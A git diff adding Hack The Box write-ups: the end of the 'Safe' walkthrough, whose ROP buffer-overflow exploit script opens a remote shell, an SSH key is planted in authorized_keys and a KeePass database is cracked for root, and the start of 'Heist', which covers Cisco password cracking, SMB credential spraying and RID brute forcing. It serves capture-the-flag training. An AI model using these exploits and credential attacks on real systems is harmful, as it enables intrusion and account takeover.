+ 0x00007fff98990520│+0x0000: 0x0000000000000001 ← $rsp
+ 0x00007fff98990528│+0x0008: 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?)
+ 0x00007fff98990530│+0x0010: 0x0000000000000000
+ 0x00007fff98990538│+0x0018: 0x00007fff98992750 → "APPDIR=/tmp/.mount_tmtxDoJV"
+ 0x00007fff98990540│+0x0020: 0x00007fff9899276c → "APPIMAGE=/tmp/tm"
+ 0x00007fff98990548│+0x0028: 0x00007fff9899277d → "COLORTERM=truecolor"
+ 0x00007fff98990550│+0x0030: 0x00007fff98992791 → "DISPLAY=:0.0"
+ 0x00007fff98990558│+0x0038: 0x00007fff9899279e → "HOME=/root"
+ ───────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x7fd2a202e08a add BYTE PTR [rax], al
+ 0x7fd2a202e08c add BYTE PTR [rax], al
+ 0x7fd2a202e08e add BYTE PTR [rax], al
+ → 0x7fd2a202e090 <_start+0> mov rdi, rsp
+ 0x7fd2a202e093 <_start+3> call 0x7fd2a202ee80 <_dl_start>
+ 0x7fd2a202e098 <_dl_start_user+0> mov r12, rax
+ 0x7fd2a202e09b <_dl_start_user+3> mov eax, DWORD PTR [rip+0x27597] # 0x7fd2a2055638 <_dl_skip_args>
+ 0x7fd2a202e0a1 <_dl_start_user+9> pop rdx
+ 0x7fd2a202e0a2 <_dl_start_user+10> lea rsp, [rsp+rax*8]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "myapp", stopped, reason: SIGTRAP
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x7fd2a202e090 → _start()
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ Reading /lib64/ld-linux-x86-64.so.2 from remote target...
+ Breakpoint 1 at 0x401163
+
+
+So here we hit our first breakpoint which is main, we do continue with the c command
+
+
+ gef➤ c
+ Continuing.
+ Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target...
+
+ Breakpoint 1, 0x0000000000401163 in main ()
+ __main__:2421: DeprecationWarning: invalid escape sequence '\'
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x000000000040115f → <****main+0> push rbp
+ $rbx : 0x0
+ $rcx : 0x00007fd2a2007718 → 0x00007fd2a2009a40 → 0x0000000000000000
+ $rdx : 0x00007fff98990538 → 0x00007fff98992750 → "APPDIR=/tmp/.mount_tmtxDoJV"
+ $rsp : 0x00007fff98990440 → 0x00000000004011b0 → <__libc_csu_init+0> push r15
+ $rbp : 0x00007fff98990440 → 0x00000000004011b0 → <__libc_csu_init+0> push r15
+ $rsi : 0x00007fff98990528 → 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?)
+ $rdi : 0x1
+ $rip : 0x0000000000401163 → <****main+4> sub rsp, 0x70
+ $r8 : 0x00007fd2a2009a50 → 0x0000000000000004
+ $r9 : 0x00007fd2a203c780 → <_dl_fini+0> push rbp
+ $r10 : 0xffffffff
+ $r11 : 0x4
+ $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
+ $r13 : 0x00007fff98990520 → 0x0000000000000001
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fff98990440│+0x0000: 0x00000000004011b0 → <__libc_csu_init+0> push r15 ← $rsp, $rbp
+ 0x00007fff98990448│+0x0008: 0x00007fd2a1e74bbb → <__libc_start_main+235> mov edi, eax
+ 0x00007fff98990450│+0x0010: 0x0000000000000000
+ 0x00007fff98990458│+0x0018: 0x00007fff98990528 → 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?)
+ 0x00007fff98990460│+0x0020: 0x0000000100400000
+ 0x00007fff98990468│+0x0028: 0x000000000040115f → <****main+0> push rbp
+ 0x00007fff98990470│+0x0030: 0x0000000000000000
+ 0x00007fff98990478│+0x0038: 0xe451416c2c196dfa
+ ───────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x40115e <****test+12> ret
+ 0x40115f <****main+0> push rbp
+ 0x401160 <****main+1> mov rbp, rsp
+ → 0x401163 <****main+4> sub rsp, 0x70
+ 0x401167 <****main+8> lea rdi, [rip+0xe9a] # 0x402008
+ 0x40116e <****main+15> call 0x401040 <****system@plt>
+ 0x401173 <****main+20> lea rdi, [rip+0xe9e] # 0x402018
+ 0x40117a <****main+27> mov eax, 0x0
+ 0x40117f <****main+32> call 0x401050 <****printf@plt>
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "myapp", stopped, reason: BREAKPOINT
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x401163 → main()
+
+Here we hit another breakpoint on main. To see what we can do let's return to ghidra, we want to somehow hijack the systemcall in our main function even though we don't have a way to put something on the stack.
+
+
+ undefined8 main(void)
+
+ {
+ char local_78 [112];
+
+ system("/usr/bin/uptime");
+ printf("\nWhat do you want me to echo back? ");
+ gets(local_78);
+ puts(local_78);
+ return 0;
+ }
+
+
+in ghidra still, we check what is the system()'s memory address
+
+
+
+Now that we know system()'s memory address, we can run our exploit.py again accordingly back into gef
+
+
+ Breakpoint 1 at 0x401163
+ gef➤ b *0x40116e
+ Breakpoint 2 at 0x40116e
+ gef➤ c
+
+
+now that we set our second breakpoint at the system call's memory address, we can continue, but the execution will halt where we want.
+
+
+ 0x40115e <****test+12> ret
+ 0x40115f <****main+0> push rbp
+ 0x401160 <****main+1> mov rbp, rsp
+ → 0x401163 <****main+4> sub rsp, 0x70
+ 0x401167 <****main+8> lea rdi, [rip+0xe9a] # 0x402008
+ 0x40116e <****main+15> call 0x401040 <****system@plt>
+ 0x401173 <****main+20> lea rdi, [rip+0xe9e] # 0x402018
+ 0x40117a <****main+27> mov eax, 0x0
+ 0x40117f <****main+32> call 0x401050 <****printf@plt>
+
+we halted 2 lines before the systemcall. First we are loading the first variable into rdi which is "/usr/bin/uptime" we can verify it with the following :
+
+
+ gef➤ x/s $rdi
+ 0x1: <****error: Cannot access memory at address 0x1>
+
+ gef➤ c
+
+ gef➤ x/s $rdi
+ 0x402008: "/usr/bin/uptime"
+
+doing so we can see the variable "/usr/bin/uptime" getting loaded into rdi, we can verify it using the registers command. From there Our goal is to find a way to put our string into $rdi, so that instead of calling uptime, the system will call something else. we change our exploit.py accordingly, adding the ropchain
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → objdump -D myapp | grep -i system
+ 0000000000401040 <****system@plt>:
+ 401040: ff 25 da 2f 00 00 jmpq *0x2fda(%rip) # 404020 <****system@GLIBC_2.2.5>
+ 40116e: e8 cd fe ff ff callq 401040 <****system@plt>
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → objdump -D myapp | grep -i test
+ 40100b: 48 85 c0 test %rax,%rax
+ 4010c2: 48 85 c0 test %rax,%rax
+ 401104: 48 85 c0 test %rax,%rax
+ 0000000000401152 :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → nano exploit.py
+
+
+So we need the jump instruction here, at the memory address 0x401040 and the test function's memory address 0x401152 to modify our python script accordingly
+
+
+ #0x40115f - main
+ #0x40116e - system
+ #0x401206 - pop r13, pop, pop
+
+ from pwn import *
+ context(terminal=['tmux','new-window'])
+ #p = gdb.debug('./myapp','b main')
+ p = remote('10.10.10.147', 1337)
+ context(os='linux',arch='amd64')
+
+
+ junk = ("A" * 112).encode()
+ bin_sh = "/bin/sh\x00".encode()
+ system = p64(0x40116e) # could also be 401040
+ pop_r13 = p64(0x401206) # later used as r13 (treat as rsp)
+ null = p64(0x0)
+ test = p64(0x401152) # RSP => RDI , JMP R13
+
+ #p.recvuntil('What do you want me to echo back ?')
+ p.sendline(junk + bin_sh + pop_r13 + system + null + null + test)
+ p.interactive()
+
+
+Looking at the last 2 lines, first we trigger the buffer overflow, then place in the bin_sh variable into the rsp register, then it is going to put the system memory location into r13, then going through the other 2 pops in that chain (with the 2 null bytes), to then finally return to test, therefore test will now execute it. p.interactive() will hopefully allow us to have an interactive shell onto the system.
+
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → python3 exploit.py
+ [+] Opening connection to 10.10.10.147 on port 1337: Done
+ [*] Switching to interactive mode
+ 04:58:56 up 18:49, 0 users, load average: 0.00, 0.00, 0.00
+ $ uname -a
+ Linux safe 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1 (2019-04-12) x86_64 GNU/Linux
+ $ cat /home/user/user.txt
+ 7aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag :)
+
+## **Part 3 : Getting Root Access**
+
+Before we start to privesc, let's first upgrade our shell since gdb's shell is all weird we don't really know how to get a full TTY
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → ssh-keygen -f safe
+ Generating public/private rsa key pair.
+ Enter passphrase (empty for no passphrase):
+ Enter same passphrase again:
+ Your identification has been saved in safe.
+ Your public key has been saved in safe.pub.
+ The key fingerprint is:
+ SHA256:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX root@prometheus
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → chmod 600 safe
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → cat safe.pub
+ ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9CrDgoACLstXIV/Y9383Iir29poCf0O56qHFkl/dMUlaW+zCIq9KEkgsHwa6SvItacsc3EObC8CPoc1N2AIR+8K1G0jVaRVMYF5os/0UbTK4pd/xXPqV8WrW4GmK4ntZoa3DCTBkeUPDveOo2i/0Fmwhj9pEFFb7/i4DlM5FwVqbowOmm8AhSXc3QuwlyV+7k8WRWPUGPWf6UCNWo4AUUAKRZvcqmEEx4uft7GjQNiKqn8X+jVanbb2UXqSyA7bPYh5336o/1lluvhUuXVX7MmMh2wbcbMz/gamxIaGI6NDByTl8pls/hcjstoPRVearRji69HlCZcRrJVZ2rf5SPLpAROUmJdHR1L6HYxVWtdvq1VWAUzkwTCWH6FDpJChAMuJeSt6pdG1OjET+KD38VaBlHQujD4lWOANEAlttV1+3o3zvbCEqOrNsag3+hqcFk5rWk9P/Bh1WkI+vOwioslFxckKmt/RcA/4wcNHkYv/0ezr59lrBGVax7RhtZbPc= root@prometheus
+
+
+_Terminal 2:_
+
+
+ $ echo 'N2AIR+8K1G0jVaRVMYF5os/0UbTK4pd/xXPqV8WrW4GmK4ntZoa3DCTBkeUPDveOo2i/0Fmwhj9pEFFb7/i4DlM5FwVqbowOmm8AhSXc3QuwlyV+7k8WRWPUGPWf6UCNWo4AUUAKRZvcqmEEx4uft7GjQNiKqn8X+jVanbb2UXqSyA7bPYh5336o/1lluvhUuXVX7MmMh2wbcbMz/gamxIaGI6NDByTl8pls/hcjstoPRVearRji69HlCZcRrJVZ2rf5SPLpAROUmJdHR1L6HYxVWtdvq1VWAUzkwTCWH6FDpJChAMuJeSt6pdG1OjET+KD38VaBlHQujD4lWOANEAlttV1+3o3zvbCEqOrNsag3+hqcFk5rWk9P/Bh1WkI+vOwioslFxckKmt/RcA/4wcNHkYv/0ezr59lrBGVax7RhtZbPc= root@prometheus' > /home/user/.ssh/authorized_keys
+
+
+_Terminal 1:_
+
+
+
+
+
+_Terminal 2:_
+
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → scp -i ../Ghidra/safe user@10.10.10.147:MyPasswords.kdbx .
+ MyPasswords.kdbx 100% 2446 24.1KB/s 00:00
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → scp -i ../Ghidra/safe user@10.10.10.147:IMG_0547.JPG .
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → ls
+ MyPasswords.kdbx
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → file MyPasswords.kdbx
+ MyPasswords.kdbx: Keepass password database 2.x KDBX
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → file IMG_0547.JPG
+ IMG_0547.JPG: JPEG image data, baseline, precision 8, 3264x2448, components 3
+
+
+
+So here we have downloaded two of the files we need to privesc. one is a .kdbx file and the other is an image.
+
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g"
+ IMG_0547.JPG:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g" > keepass_hash
+
+
+from here we have our keepass hash, let's crack it with john and rockyou.txt
+
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → john -w:/usr/share/wordlists/rockyou.txt keepass_hash
+ Created directory: /root/.john
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (KeePass [SHA256 AES 32/64])
+ Cost 1 (iteration count) is 60000 for all loaded hashes
+ Cost 2 (version) is 2 for all loaded hashes
+ Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
+ Will run 4 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ bullshit (MyPasswords)
+
+
+Good choice for a master password
+
+
+
+
+ user@safe:~$ su
+ Password:
+ root@safe:/home/user# uname -a
+ Linux safe 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1 (2019-04-12) x86_64 GNU/Linux
+ root@safe:/home/user# cat /root/root.txt
+ d7XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to escalate privileges and print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/36.md b/Easy/36.md
new file mode 100644
index 0000000..66be90a
--- /dev/null
+++ b/Easy/36.md
@@ -0,0 +1,698 @@
+# Heist Writeup
+
+
+
+## Heist Introduction :
+
+Heist is an easy Windows box that was released back in August 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~]
+ → nmap -F 10.10.10.149
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 08:26 GMT
+ Nmap scan report for 10.10.10.149
+ Host is up (0.098s latency).
+ Not shown: 97 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+ 135/tcp open msrpc
+ 445/tcp open microsoft-ds
+
+ Nmap done: 1 IP address (1 host up) scanned in 3.04 seconds
+
+ λ nihilist [ 10.10.14.7/23 ] [~]
+ → nmap -sCV -p80,135,445 10.10.10.149
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 08:28 GMT
+ Nmap scan report for 10.10.10.149
+ Host is up (0.11s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 10.0
+ | http-cookie-flags:
+ | /:
+ | PHPSESSID:
+ |_ httponly flag not set
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Microsoft-IIS/10.0
+ | http-title: Support Login Page
+ |_Requested resource was login.php
+ 135/tcp open msrpc Microsoft Windows RPC
+ 445/tcp open microsoft-ds?
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: 57s
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2020-02-18T08:30:02
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 65.57 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up the http service on port 80 so let's see what we are dealing with. http://10.10.10.149/login.php and we navigate over to issues.php
+
+ 
+
+
+ version 12.2
+ no service pad
+ service password-encryption
+ !
+ isdn switch-type basic-5ess
+ !
+ hostname ios-1
+ !
+ security passwords min-length 12
+ enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
+ !
+ username rout3r password 7 0242114B0E143F015F5D1E161713
+ username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
+ !
+ !
+ ip ssh authentication-retries 5
+ ip ssh version 2
+ !
+ !
+ router bgp 100
+ synchronization
+ bgp log-neighbor-changes
+ bgp dampening
+ network 192.168.0.0Â mask 300.255.255.0
+ timers bgp 3 9
+ redistribute connected
+ !
+ ip classless
+ ip route 0.0.0.0 0.0.0.0 192.168.0.1
+ !
+ !
+ access-list 101 permit ip any any
+ dialer-list 1 protocol ip list 101
+ !
+ no ip http server
+ no ip http secure-server
+ !
+ line vty 0 4
+ session-timeout 600
+ authorization exec SSH
+ transport input ssh
+
+
+
+Here we have a cisco router config, with 2 type 7 passwords, so we'll use [this python script](https://github.com/theevilbit/ciscot7) to decrypt them. As for the type 5 password we'll just use hashcat in combination with rockyou.txt to find the password.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → git clone https://github.com/theevilbit/ciscot7
+ Cloning into 'ciscot7'...
+ remote: Enumerating objects: 4, done.
+ remote: Counting objects: 100% (4/4), done.
+ remote: Compressing objects: 100% (4/4), done.
+ remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 15
+ Unpacking objects: 100% (19/19), 6.73 KiB | 574.00 KiB/s, done.
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → cd ciscot7
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ✔
+ → ls [21af318]
+ ciscot7.py LICENSE.md README.md
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ✔
+ → python ciscot7.py -p 0242114B0E143F015F5D1E161713 [21af318]
+ Decrypted password: $uperP@ssword
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ✔
+ → python ciscot7.py -p 02375012182C1A1D751618034F36415408 [21af318]
+ Decrypted password: Q4)sJu\Y8qz*A3?d
+
+
+now that we have the two type 7 passwords, we'll try to get the type 5 password using hashcat and rockyou.txt
+
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ✔
+ → echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' >> cis.md5 [21af318]
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ?
+ → cat cis.md5 [21af318]
+ $1$pdQG$o8nrSzsGXeaduXrjlvKc91
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ?
+ → hashcat -m 500 [21af318]
+ Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...
+
+ Try --help for more help.
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ?
+ → hashcat -m 500 cis.md5 /usr/share/wordlists/rockyou.txt [21af318]
+
+
+This takes some time to run, but we get the password "stealth1agent"
+
+ * rout3r:$uperP@ssword
+ * admin:Q4)sJu\Y8qz*A3?d
+ * secret:stealth1agent
+
+
+
+other than those credentials, we have potential usernames : Hazard
+
+In other words, we have 4 possible usernames, and 3 possible passwords, let's create users.txt and pass.txt , in order to use crackmapexec on the shares our nmap scan picked up earlier.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → nano users.txt
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → nano pass.txt
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt
+ SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\hazard:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [+] SUPPORTDESK\hazard:stealth1agent
+ SMB 10.10.10.149 445 SUPPORTDESK [+] Enumerated shares
+ SMB 10.10.10.149 445 SUPPORTDESK Share Permissions Remark
+ SMB 10.10.10.149 445 SUPPORTDESK ----- ----------- ------
+ SMB 10.10.10.149 445 SUPPORTDESK ADMIN$ Remote Admin
+ SMB 10.10.10.149 445 SUPPORTDESK C$ Default share
+ SMB 10.10.10.149 445 SUPPORTDESK IPC$ READ Remote IPC
+
+
+We get matching credentials for hazard:stealth1agent ! Let's fire up the metasploit database and then launch msfconsole to see what we can do from there.
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Heist]
+ → msfdb init
+ [+] Starting database
+ [+] Creating database user 'msf'
+ [+] Creating databases 'msf'
+ [+] Creating databases 'msf_test'
+ [+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
+ [+] Creating initial database schema
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Heist]
+ → msfconsole
+
+ msf5 > creds
+ Credentials
+ ===========
+
+ host origin service public private realm private_type JtR Format
+ ---- ------ ------- ------ ------- ----- ------------ ----------
+
+ msf5 > use auxiliary/scanner/smb/smb_login
+ msf5 auxiliary(scanner/smb/smb_login) > setg USER_FILE user.txt
+ USER_FILE => user.txt
+ msf5 auxiliary(scanner/smb/smb_login) > setg PASS_FILE pass.txt
+ PASS_FILE => pass.txt
+ msf5 auxiliary(scanner/smb/smb_login) > setg RHOSTS 10.10.10.149
+ RHOSTS => 10.10.10.149
+ msf5 auxiliary(scanner/smb/smb_login) > run
+
+
+we can also run this and we would get the same results as the python script we ran before, matching hazard:stealth1agent, for this next section we'll use impacket scripts to continue with our enumeration process
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Heist]
+ → locate psexec.py
+ /usr/share/doc/python3-impacket/examples/psexec.py
+ /usr/share/set/src/fasttrack/psexec.py
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Heist]
+ → cd /usr/share/doc/python3-impacket/examples/
+
+ λ root [ 10.10.14.7/23 ] [doc/python3-impacket/examples]
+ → ls
+ atexec.py getST.py mimikatz.py opdump.py rpcdump.py smbserver.py
+ dcomexec.py getTGT.py mqtt_check.py ping6.py sambaPipe.py sniffer.py
+ dpapi.py GetUserSPNs.py mssqlclient.py ping.py samrdump.py sniff.py
+ esentutl.py goldenPac.py mssqlinstance.py psexec.py secretsdump.py split.py
+ GetADUsers.py ifmap.py netview.py raiseChild.py services.py ticketer.py
+ getArch.py karmaSMB.py nmapAnswerMachine.py rdp_check.py smbclient.py wmiexec.py
+ GetNPUsers.py kintercept.py ntfs-read.py registry-read.py smbexec.py wmipersist.py
+ getPac.py lookupsid.py ntlmrelayx.py reg.py smbrelayx.py wmiquery.py
+
+ λ root [ 10.10.14.7/23 ] [doc/python3-impacket/examples]
+ → python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149
+
+
+The above command is going to run a RID/SID bruteforce which is going to give us more usernames
+
+
+ λ root [ 10.10.14.7/23 ] [doc/python3-impacket/examples]
+ → python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149
+ Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
+
+ [*] Brute forcing SIDs at 10.10.10.149
+ [*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
+ [*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
+ 500: SUPPORTDESK\Administrator (SidTypeUser)
+ 501: SUPPORTDESK\Guest (SidTypeUser)
+ 503: SUPPORTDESK\DefaultAccount (SidTypeUser)
+ 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
+ 513: SUPPORTDESK\None (SidTypeGroup)
+ 1008: SUPPORTDESK\Hazard (SidTypeUser)
+ 1009: SUPPORTDESK\support (SidTypeUser)
+ 1012: SUPPORTDESK\Chase (SidTypeUser)
+ 1013: SUPPORTDESK\Jason (SidTypeUser)
+
+
+And we're getting interesting results ! we have a few more possible usernames to add to our users.txt file
+
+
+ secret
+ admin
+ rout3r
+ hazard
+ support
+ chase
+ jason
+
+
+running crackmapexec again, we are getting other matching credentials :
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt
+ SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\support:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\support:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\chase:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [+] SUPPORTDESK\chase:Q4)sJu\Y8qz*A3?d
+
+
+Now that we have our matching credentials : chase:Q4)sJu\Y8qz*A3?d let's use evil-winrm to login.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → git clone https://github.com/Hackplayers/evil-winrm
+ Cloning into 'evil-winrm'...
+ remote: Enumerating objects: 65, done.
+ remote: Counting objects: 100% (65/65), done.
+ remote: Compressing objects: 100% (54/54), done.
+ remote: Total 765 (delta 33), reused 27 (delta 11), pack-reused 700
+ Receiving objects: 100% (765/765), 1.97 MiB | 485.00 KiB/s, done.
+ Resolving deltas: 100% (438/438), done.
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → cd evil-winrm
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/evil-winrm] at master ✔
+ → cat Gemfile [e501272]
+ source 'https://rubygems.org'
+
+ gem 'winrm'
+ gem 'winrm-fs'
+ gem 'stringio'
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/evil-winrm] at master ✔
+ → gem install winrm winrm-fs stringio [e501272]
+ Fetching: builder-3.2.4.gem (100%)
